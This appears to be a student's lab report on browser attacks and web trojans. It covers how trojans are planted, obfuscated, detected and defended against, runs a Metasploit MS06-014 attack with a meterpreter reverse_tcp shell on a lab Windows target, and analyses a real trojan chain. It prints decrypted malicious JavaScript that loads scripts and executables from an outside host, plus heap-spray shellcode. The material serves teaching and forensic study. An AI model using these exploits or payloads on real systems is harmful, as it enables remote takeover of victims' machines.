一、实践内容
1、Web浏览的安全问题与威胁
Web浏览器软件的安全困境三要素
在复杂性方面,现代Web浏览器软件由于需要支持多种类型应用层协议、一系列页面标准规范、多种客户端执行环境,并满足大量的用户浏览需求,因此变得非常复杂和庞大。
在可扩展性方面,现代Web浏览器可能是最突出可扩展特性支持的软件类型。
在连通性方面,现代Web浏览器本身就是要为用户实现“随时随地浏览互联网”。
Web浏览安全威胁
作为整个Web应用体系结构中的客户端,Web浏览器所处系统平台、Web浏览器软件及插件程序、以及使用浏览器的终端用户一起构成了一个完整的Web浏览环境。有如下四种安全威胁:
- 针对传输网络的网络协议安全威胁
- 针对Web浏览端系统平台的安全威胁
- 针对Web浏览器软件及插件程序的渗透攻击威胁
- 针对互联网用户的社会工程学攻击威胁
2、Web浏览端的渗透攻击威胁——网页木马
网页木马的产生与发展背景
网页木马是从恶意网页脚本所孕育和发展出来的。网页木马安全威胁在中国互联网上出现于2003年甚至更早。网页木马出现并一直存在的原因包括经济层面由利益所驱动的地下经济链,以及技术层面在大量互联网用户主机上存在的Web浏览端安全漏洞。
典型的网页木马利用漏洞有如下特性:网页木马所攻击的安全漏洞存在位置非常多样化,网页木马在不断发掘和利用其它流行应用软件中的安全漏洞,影响范围广的安全漏洞会被网页木马持续利用等。
网页挂马机制
- 内嵌HTML标签:第一类策略使用内嵌HTML标签,如iframe、frame等,将网页木马链接嵌入到网站首页或其他页面中;
- 恶意Script脚本:利用script脚本标签通过外部引用脚本的方式来包含网页木马;
- 内嵌对象链接:第三类网页挂马策略利用图片、Flash等内嵌对象中的特定方法来完成指定页面的加载,这种挂马技术能够产生出一些包含网页木马链接的图片或Flash文件,通过向一些允许用户上传图片和Flash文件的网站进行上传,从而造成这些网站特定页面被挂马危害的后果。
- ARP欺骗挂马:arp漆面挂马不需要真正地攻陷目标网站,在同一以太网网段内,攻击者通过ARP欺骗方法就可以进行中间人攻击,劫持所有目标网站出入的网络流量,并可在目标网站的HTML反馈包中注入任意的恶意脚本,从而使其成为将网络访问流量链接至网页木马的挂马站点。
混淆机制
- 将代码重新排版,去除缩进、空行、换行、注释等;
- 通过大小写变换、十六进制编码、escape编码、unicode编码等方法对网页木马进行编码混淆;
- 通过通用或定制的加密工具对网页木马进行加密得到密文,然后使用脚本语言中包含的解密函数进行解密,再使用document.Write()或eval()进行动态输出或执行;
- 利用字符串运算、数学运算或特殊函数混淆代码;
- 修改网页木马文件掩码欺骗反病毒软件,或对网页木马文件结构进行混淆,来伪装正常文件。
网页木马的检测与分析技术
网页木马的分析与检测技术方法有:
- 基于特征码匹配的传统检测方法
- 基于统计与机器学习的静态分析方法
- 基于动态行为结果判定的监测分析方法
- 基于模拟浏览器环境的动态分析检测方法。
针对网页木马的检测分析方法分为静态分析和动态分析两大类。
试图通过特征码匹配和机器学习方法,在网页木马的外在形态层次上构建出较为准确的检测方法;
动态行为分析方法实质上是从网页木马的外部表现行为触发,根据网页木马成功攻击客户端软件后对系统造成的行为后果进行判定。
网页木马防范措施
采用操作系统本身提供的在线更新以及第三方软件所提供的常用应用软件更新机制
安装反病毒软件,同时养成安全上网浏览的好习惯,借助站点安全评估工具的帮助
安装Mac OS/Linux操作系统,并使用冷门浏览器上网。
二、实践过程
1、web浏览器渗透攻击
任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
攻击机:kali(192.168.59.128)
靶机:Win2kServer(192.168.59.131)
①选择使用Metasploit中的MS06-014渗透攻击模块
在kali中启动msfconsole
输入指令:search MS06-014 搜索Metasploit中的MS06-014,渗透攻击模块
输入指令:use exploit/windows/browser/ie_createobject,使用MS06-014渗透攻击模块
②选择PAYLOAD为任意远程Shell连接
输入指令:set LHOST 192.168.59.128,配置攻击机IP
输入指令:set payload windows/meterpreter/reverse_tcp,设置载荷
输入指令:show options,查看配置信息
③设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本
输入指令:exploit,构造出恶意网页木马脚本,得到有木马的网址:http://192.168.59.128:8080/YZcG3FzW9a8
④在靶机环境中启动浏览器,验证与服务器的连通性,并访问而已网页木马脚本URL
打开靶机Win2kServer的浏览器,访问step4得到的本地地址http://172.30.6.230:8080/ighKZrcn4,浏览器会返回一串字符串。
⑤在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令
回到攻击机kali,发现攻击机和靶机之间已经建立了会话连接
输入ipconfig,在靶机上远程执行查看Win2kServerIP地址
2、取证分析实践—网页木马攻击场景分析
①首先你应该访问start.html,在这个文件中给出了new09.htm的地址
从学习通下载网页挂马分析实践参考(上).pdf,打开文件后搜索“new09.htm”,共有两处,发现其中的start.html在引用new09.htm时没有使用绝对路径,由此可知两者应该在同一目录下
②在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到http://192.168.68.253/scom/hashed/哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。
在new09.htm 的代码中,解密出了两个文件地址:
iframe引用的http://aa.18dd.net/aa/kl.htm文件
javascript引用的http://js.users.51.la/1299644.js文件
对http://aa.18dd.net/aa/kl.htm进行MD5散列
对http://js.users.51.la/1299644.js进行MD5散列
由上面得到的32位MD5散列,再根据http://192.168.68.253/scom/hashed/哈希值
构造出:
http://192.168.68.253/scom/hashed/7f60672dcd6b5e90b6772545ee219bd3
http://192.168.68.253/scom/hashed/23180a42a2ff1192150231b44ffdf3d3
将这个两个文件下载下来,打开文档
根据文档的提示,可知23180a42a2ff1192150231b44ffdf3d3文件是无用的
我们着重分析7f60672dcd6b5e90b6772545ee219bd3文件,这个文件中的代码采用了XXTEA+Base64加密,想要解密恢复出原来的代码,就要找到密钥
通过分析文件内容的t=utf8to16(xxtea_decrypt(base64decode(t), ‘\x73\x63\x72\x69\x70\x74’));发现这是将\x73\x63\x72\x69\x70\x74十六进制转文本字符串,由此可知密钥是script
这样一来我们就能对它进行进行XXTEA+Base64解密:
输入密钥script点击“解密”,得到十六进制加密。再对引号中的内容进行解密,保存得到的结果
得到的解密结果如下:
function init(){
document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
try{
var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){
};
finally{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie='ce=windowsxp;path=/;expires='+expires.toGMTString();
if(e!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/1.js><\/script>")}
else{
try{
var f;var storm=new ActiveXObject("MPS.StormPlayer");}
catch(f){
};
finally{
if(f!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/b.js><\/script>")}}
try{
var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1");}
catch(g){
};
finally{
if(g!="[object Error]"){
document.write("<script src=http:\/\/aa.18dd.net\/aa\/pps.js><\/script>")}}
try{
var h;var obj=new ActiveXObject("BaiduBar.Tool");}
catch(h){
};
finally{
if(h!="[object Error]"){
obj.DloadDS("http://down.18dd.net/bb/bd.cab", "bd.exe", 0)}}
}}}
分析解密结果内容可知,该文件攻击的应用程序漏洞是:
微软数据库访问对象漏洞Adodb.Stream、暴风影音漏洞MPS.StormPlayer、PPStream漏洞POWERPLAYER.PowerPlayerCtrl.1、百度搜霸漏洞BaiduBar.Tool,这个文件引用三个 js 文件和一个压缩包(bd.cab,解开后是 bd.exe)
③如果解密出的地址给出的是网页或脚本文件,请继续解密
上述文件包含了四个应用程序漏洞对应的地址:
http://aa.18dd.net/aa/1.js
http://aa.18dd.net/aa/b.js
http://aa.18dd.net/aa/pps.js
http://down.18dd.net/bb/bd.cab
这些都是网页,需要继续对其解密。
分别对这些链接作MD5散列
打开http://aa.18dd.net/aa/1.js对应的5d7e9058a857aa2abee820d5473c5fa4文件
将十六进制数转换为字符串,得到如下结果。
由转换结果可知,代码下载了http://down.18dd.net/bb/014.exe 可执行文件
打开http://aa.18dd.net/aa/b.js对应的3870c28cc279d457746b3796a262f166文件
此处使用的是packed加密,需要进行Unpack解密
解密后得到以下内容,分析可发现存在shellcode下载器,这个下载器下载了http://down.18dd.net/bb/bf.exe 可执行文件
var bigblock=unescape("%u9090%u9090");
var headersize=20;
var shellcode=unescape("%uf3e9%u0000"+"%u9000%u9090%u5a90%ua164%u0030%u0000%u408b%u8b0c"+"%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378"+"%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b"+"%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%ufcef"+"%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1"+"%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103"+"%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904"+"%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b"+"%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e"+"%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d"+"%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320"+"%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344"+"%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc"+"%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0"+"%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab"+"%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f"+"%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574"+"%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e"+"%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00"
最低0.47元/天 解锁文章
157
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
